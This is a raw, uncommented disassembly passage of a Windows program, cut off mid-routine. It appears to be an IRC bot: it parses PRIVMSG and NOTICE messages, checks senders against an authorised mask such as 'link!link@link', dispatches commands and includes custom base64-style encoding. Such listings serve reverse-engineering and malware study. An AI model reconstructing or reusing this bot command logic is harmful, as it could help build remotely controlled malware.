push offset asc_41A07C ; "]["
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C8], eax
mov eax, [ebp+var_7C8]
mov [ebp+var_7C0], eax
jmp loc_40E09A
; ---------------------------------------------------------------------------
loc_40E123: ; CODE XREF: sub_40D871+7FA�j
; sub_40D871+832�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40D871+731�j
cmp [ebp+arg_0], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E153
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E158
loc_40E153: ; CODE XREF: sub_40D871+8BB�j
; sub_40D871+8C4�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: sub_40D871+8E0�j
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E1C0
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1AB
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E1BE
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_40D871+923�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
and [ebp+var_84], 0
loc_40E1BE: ; CODE XREF: sub_40D871+938�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40D871+915�j
push offset aNotice ; "NOTICE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E211
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1F9
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E20F
; ---------------------------------------------------------------------------
loc_40E1F9: ; CODE XREF: sub_40D871+971�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
mov [ebp+var_84], 1
loc_40E20F: ; CODE XREF: sub_40D871+986�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E211: ; CODE XREF: sub_40D871+963�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40D871:loc_40E1BE�j
; sub_40D871:loc_40E20F�j
cmp [ebp+var_84], 3
jnz loc_40E321
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
and [ebp+var_7CC], 0
jmp short loc_40E253
; ---------------------------------------------------------------------------
loc_40E246: ; CODE XREF: sub_40D871:loc_40E31C�j
mov eax, [ebp+var_7CC]
inc eax
mov [ebp+var_7CC], eax
loc_40E253: ; CODE XREF: sub_40D871+9D3�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax*4], 0
jz short loc_40E26B
cmp [ebp+var_7CC], 0Fh
jnz short loc_40E2B8
loc_40E26B: ; CODE XREF: sub_40D871+9EF�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D4], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E2B6
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
mov byte ptr [eax+ecx-1], 1
loc_40E2B6: ; CODE XREF: sub_40D871+A2C�j
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40D871+9F8�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D0], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E31C
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E31C: ; CODE XREF: sub_40D871+A79�j
jmp loc_40E246
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40D871+9AC�j
; sub_40D871:loc_40E2B6�j ...
push offset byte_41EE48
push [ebp+var_90]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E340
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
loc_40E340: ; CODE XREF: sub_40D871+AC4�j
push 7Ah
push 0
lea eax, [ebp+var_7C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov [ebp+var_88], eax
and [ebp+var_8C], 0
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_80], eax
loc_40E370: ; CODE XREF: sub_40D871:loc_40E3F2�j
cmp [ebp+var_80], 3
jnb short loc_40E378
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E378: ; CODE XREF: sub_40D871+B03�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_40E393
mov eax, [ebp+var_80]
dec eax
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E393: ; CODE XREF: sub_40D871+B17�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-3]
cmp eax, 20h
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-2]
cmp eax, 2Dh
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 7Ah
jg short loc_40E3F0
mov [ebp+var_8C], 1
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
mov [ebp+eax+var_7C], 1
mov eax, [ebp+var_80]
sub eax, 3
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40D871+B32�j
; sub_40D871+B44�j ...
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E3F2: ; CODE XREF: sub_40D871+B20�j
; sub_40D871+B7D�j
jmp loc_40E370
; ---------------------------------------------------------------------------
loc_40E3F7: ; CODE XREF: sub_40D871+B05�j
; sub_40D871:loc_40E3F0�j
cmp [ebp+var_8C], 0
jz loc_40E4CC
and [ebp+var_7D8], 0
jmp short loc_40E41A
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_40D871:loc_40E4C7�j
mov eax, [ebp+var_7D8]
inc eax
mov [ebp+var_7D8], eax
loc_40E41A: ; CODE XREF: sub_40D871+B9A�j
cmp [ebp+var_7D8], 10h
jnb loc_40E4CC
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_40E43B
jmp loc_40E4CC
; ---------------------------------------------------------------------------
loc_40E43B: ; CODE XREF: sub_40D871+BC3�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
cmp [edx+ecx*4], eax
jb short loc_40E4C7
cmp [ebp+var_8C], 0
jz short loc_40E48F
cmp [ebp+var_7D8], 0
jz short loc_40E488
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4-4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
mov ecx, [edx+ecx*4-4]
and byte ptr [ecx+eax], 0
loc_40E488: ; CODE XREF: sub_40D871+BF1�j
and [ebp+var_8C], 0
loc_40E48F: ; CODE XREF: sub_40D871+BE8�j
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
and dword ptr [ecx+eax*4], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
and dword ptr [ecx+eax*4], 0
loc_40E4C7: ; CODE XREF: sub_40D871+BDF�j
jmp loc_40E40D
; ---------------------------------------------------------------------------
loc_40E4CC: ; CODE XREF: sub_40D871+B8D�j
; sub_40D871+BB0�j ...
push offset byte_41EE48
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E513
mov eax, [ebp+arg_10]
add eax, 0Ch
push eax
mov eax, [ebp+arg_C]
add eax, 0Ch
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E513: ; CODE XREF: sub_40D871+C6F�j
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jnz short loc_40E521
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_40D871+CA9�j
and [ebp+var_7DC], 0
push offset asc_41A070 ; "*"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E54A
mov [ebp+var_7DC], 1
jmp loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40D871+CCB�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset byte_41EE48
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E56C
mov [ebp+var_7DC], 1
jmp short loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_40D871+CF0�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
cmp eax, 4
ja short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
movsx eax, byte ptr [ecx+eax-1]
cmp eax, 25h
jnz short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
and byte ptr [ecx+eax-1], 0
call sub_410422
xor edx, edx
push 64h
pop ecx
div ecx
inc edx
mov [ebp+var_7E0], edx
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B9C ; atoi
pop ecx
cmp eax, [ebp+var_7E0]
jl short loc_40E5DE
mov [ebp+var_7DC], 1
loc_40E5DE: ; CODE XREF: sub_40D871+CD4�j
; sub_40D871+CF9�j ...
movzx eax, [ebp+var_7DC]
test eax, eax
jz short loc_40E615
mov eax, [ebp+arg_10]
add eax, 10h
push eax
mov eax, [ebp+arg_C]
add eax, 10h
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
loc_40E615: ; CODE XREF: sub_40D871+31�j
; sub_40D871+4C�j ...
pop edi
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E618 proc near ; CODE XREF: .text:0040C9E4�p
; sub_40D871+87F�p ...
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_1180 = dword ptr -1180h
var_114C = dword ptr -114Ch
var_1148 = dword ptr -1148h
var_1144 = dword ptr -1144h
var_113C = dword ptr -113Ch
var_1138 = dword ptr -1138h
var_1109 = byte ptr -1109h
var_1108 = byte ptr -1108h
var_1089 = byte ptr -1089h
var_1088 = byte ptr -1088h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1194h
call sub_416BC0
and [ebp+var_4], 0
push 10h
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1088]
push eax
push [ebp+arg_0]
call sub_407928
add esp, 14h
push offset a302 ; "302"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E66D
mov dword_41E9AC, 1
jmp short loc_40E674
; ---------------------------------------------------------------------------
loc_40E66D: ; CODE XREF: sub_40E618+47�j
and dword_41E9AC, 0
loc_40E674: ; CODE XREF: sub_40E618+53�j
cmp [ebp+var_1148], 0
jz short loc_40E686
cmp [ebp+var_1144], 0
jnz short loc_40E68B
loc_40E686: ; CODE XREF: sub_40E618+63�j
jmp locret_40E941
; ---------------------------------------------------------------------------
loc_40E68B: ; CODE XREF: sub_40E618+6C�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40E6BB
push offset aNotice ; "NOTICE"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40E7A5
loc_40E6BB: ; CODE XREF: sub_40E618+87�j
cmp [ebp+var_113C], 0
jz loc_40E7A5
cmp [ebp+var_1138], 0
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+2]
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
push eax
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_113C]
add eax, [ebp+var_1190]
and byte ptr [eax+1], 0
push 0Dh
lea eax, [ebp+var_1180]
push eax
lea eax, [ebp+var_113C]
push eax
push [ebp+var_1180]
push [ebp+var_113C]
call sub_407928
add esp, 14h
loc_40E7A5: ; CODE XREF: sub_40E618+9D�j
; sub_40E618+AA�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_1148]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E853
and [ebp+var_1194], 0
jmp short loc_40E7D5
; ---------------------------------------------------------------------------
loc_40E7C8: ; CODE XREF: sub_40E618+234�j
mov eax, [ebp+var_1194]
inc eax
mov [ebp+var_1194], eax
loc_40E7D5: ; CODE XREF: sub_40E618+1AE�j
mov eax, [ebp+var_1194]
cmp off_41DA5C[eax*4], 0
jnz short loc_40E7E7
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E618+1CB�j
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
mov eax, [ebp+var_1148]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E839
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105AD
pop ecx
mov [ebp+var_4], 1
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E839: ; CODE XREF: sub_40E618+203�j
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105AD
pop ecx
jmp loc_40E7C8
; ---------------------------------------------------------------------------
loc_40E851: ; CODE XREF: sub_40E618+1CD�j
; sub_40E618+21F�j
jmp short loc_40E85A
; ---------------------------------------------------------------------------
loc_40E853: ; CODE XREF: sub_40E618+1A1�j
mov [ebp+var_4], 1
loc_40E85A: ; CODE XREF: sub_40E618:loc_40E851�j
and [ebp+var_88], 0
mov [ebp+var_114C], 1
jmp short loc_40E87A
; ---------------------------------------------------------------------------
loc_40E86D: ; CODE XREF: sub_40E618:loc_40E90A�j
mov eax, [ebp+var_114C]
inc eax
mov [ebp+var_114C], eax
loc_40E87A: ; CODE XREF: sub_40E618+253�j
cmp [ebp+var_114C], 80h
jge loc_40E90F
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_40E8B6
mov [ebp+var_88], 1
mov eax, [ebp+var_114C]
and byte ptr [ebp+eax+var_88+3], 0
loc_40E8B6: ; CODE XREF: sub_40E618+284�j
cmp [ebp+var_88], 0
jnz short loc_40E8DA
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov byte ptr [ebp+ecx+var_88+3], al
loc_40E8DA: ; CODE XREF: sub_40E618+2A5�j
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov [ebp+ecx+var_1109], al
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E90A
jmp short loc_40E90F
; ---------------------------------------------------------------------------
loc_40E90A: ; CODE XREF: sub_40E618+2EE�j
jmp loc_40E86D
; ---------------------------------------------------------------------------
loc_40E90F: ; CODE XREF: sub_40E618+26C�j
; sub_40E618+2F0�j
and [ebp+var_5], 0
and [ebp+var_1089], 0
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1108]
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+var_4]
call sub_40D871
add esp, 14h
locret_40E941: ; CODE XREF: sub_40E618:loc_40E686�j
leave
retn
sub_40E618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E943 proc near ; CODE XREF: .text:00416ABA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40E94E: ; CODE XREF: sub_40E943+32�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E960
jmp short locret_40E977
; ---------------------------------------------------------------------------
loc_40E960: ; CODE XREF: sub_40E943+19�j
push [ebp+var_8]
call sub_407B5E
pop ecx
mov [ebp+var_4], eax
push [ebp+var_8]
call sub_40E618
pop ecx
jmp short loc_40E94E
; ---------------------------------------------------------------------------
locret_40E977: ; CODE XREF: sub_40E943+1B�j
leave
retn
sub_40E943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E979 proc near ; CODE XREF: .text:004168D5�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40E98A
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E979+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E98A: ; CODE XREF: sub_40E979+8�j
cmp [ebp+var_4], 100h
jnb short loc_40E99F
mov eax, [ebp+var_4]
and byte_41E9B0[eax], 0
jmp short loc_40E983
; ---------------------------------------------------------------------------
loc_40E99F: ; CODE XREF: sub_40E979+18�j
and [ebp+var_4], 0
jmp short loc_40E9AC
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E979+4C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E9AC: ; CODE XREF: sub_40E979+2A�j
cmp [ebp+var_4], 40h
jnb short locret_40E9C7
mov eax, [ebp+var_4]
movzx eax, byte_41A18C[eax]
mov cl, byte ptr [ebp+var_4]
mov byte_41E9B0[eax], cl
jmp short loc_40E9A5
; ---------------------------------------------------------------------------
locret_40E9C7: ; CODE XREF: sub_40E979+37�j
leave
retn
sub_40E979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C9 proc near ; CODE XREF: sub_40A9CF+34C�p
; sub_40A9CF+E18�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 2
jnb short loc_40E9E8
xor eax, eax
jmp locret_40EB4C
; ---------------------------------------------------------------------------
loc_40E9E8: ; CODE XREF: sub_40E9C9+16�j
and [ebp+var_4], 0
and [ebp+var_8], 0
loc_40E9F0: ; CODE XREF: sub_40E9C9+17A�j
push 1
pop eax
test eax, eax
jz loc_40EB48
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA29
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA2E
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40E9C9+40�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA2E: ; CODE XREF: sub_40E9C9+5E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EA66
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
sar eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA66: ; CODE XREF: sub_40E9C9+72�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E9C9+9B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA99
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA9E
; ---------------------------------------------------------------------------
loc_40EA99: ; CODE XREF: sub_40E9C9+B0�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA9E: ; CODE XREF: sub_40E9C9+CE�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EAD6
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EAD8
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40E9C9+E2�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EAD8: ; CODE XREF: sub_40E9C9+10B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EB06
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 6
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EB08
; ---------------------------------------------------------------------------
loc_40EB06: ; CODE XREF: sub_40E9C9+11D�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_40E9C9+13B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EB3A
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, byte_41E9B0[eax]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EB3C
; ---------------------------------------------------------------------------
loc_40EB3A: ; CODE XREF: sub_40E9C9+14C�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40E9C9+16F�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp loc_40E9F0
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40E9C9+2C�j
; sub_40E9C9:loc_40EA29�j ...
mov eax, [ebp+var_4]
dec eax
locret_40EB4C: ; CODE XREF: sub_40E9C9+1A�j
leave
retn
sub_40E9C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4E proc near ; CODE XREF: sub_40A9CF+292�p
; sub_40A9CF+D12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
loc_40EB60: ; CODE XREF: sub_40EB4E:loc_40EC83�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 4
and eax, 30h
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EBC2
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp loc_40EC88
; ---------------------------------------------------------------------------
loc_40EBC2: ; CODE XREF: sub_40EB4E+52�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 4
and ecx, 0Fh
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 2
and eax, 3Ch
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC2A
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC2A: ; CODE XREF: sub_40EB4E+BD�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 6
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
